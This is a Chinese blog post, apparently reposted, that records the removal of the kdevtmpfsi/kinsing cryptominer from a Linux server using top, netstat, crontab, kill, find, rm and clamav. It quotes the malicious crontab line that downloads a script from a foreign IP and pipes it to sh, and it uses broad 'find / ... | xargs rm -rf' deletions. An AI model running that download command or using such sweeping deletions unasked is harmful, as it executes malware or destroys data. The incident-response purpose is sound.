首页 > 其他 > 详细

记录kdevtmpfsi挖矿病毒处理记录和方法

时间:2020-01-02 16:26:58      阅读:169      评论:0      收藏:0      [点我收藏+]

病毒名称:kdevtmpfsi

状态:CPU爆满,导致线上服务宕机。

图片是盗的,进程占用是真实的。

 

 技术分享图片

 

 

 

 

 

 

1、# top

     查看cpu占用情况,找到占用cpu的进程     最后是  kdevtmpfsi

2、# netstat -natp 

     根据上面的进程名查看与内网的 tcp 链接异常 ,看到陌生ip,查出为国外ip,估计主机被人种后门了

此时,挖矿脚本大概率定时在你的crontab里面。

crontab -l ,发现异常定时任务,* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1

查看这个进程运行状态

systemctl status 3127

 技术分享图片

systemctl status 3127

 

ps -aux | grep kinsing

 

ps -aux | grep kdevtmpfsi

 

kill  -9   3127

 

cd  /tmp

 

ls

 

 rm -rf kdevtmpfsi 

 

rm -rf /var/tmp/kinsing  记得这个守护进程的文件也要删掉,找不到的话,也可以用这个命令

 

find / -name kdevtmpfsi

 

find / -name kinsing

 

进入/var/spool/cron  查看是否有相关的木马定时任务在执行  有的话删掉再重启下crontab

 

后续工作溯源,找到程序漏洞,封禁访问ip,不正常ip。源程序下载。

使用clamav对整个Linux做全盘扫描,确定被感染文件并删除。

技术分享图片

 

 查找守护进程文件变种名字。

技术分享图片

 

全部删除 

 

find / -name "kinsing*" | xargs rm -rf

 

至此杀毒工作基本进入尾声。后面几天观察服务器服务,进程是否异常。

记录kdevtmpfsi挖矿病毒处理记录和方法

原文:https://www.cnblogs.com/llody/p/12133372.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!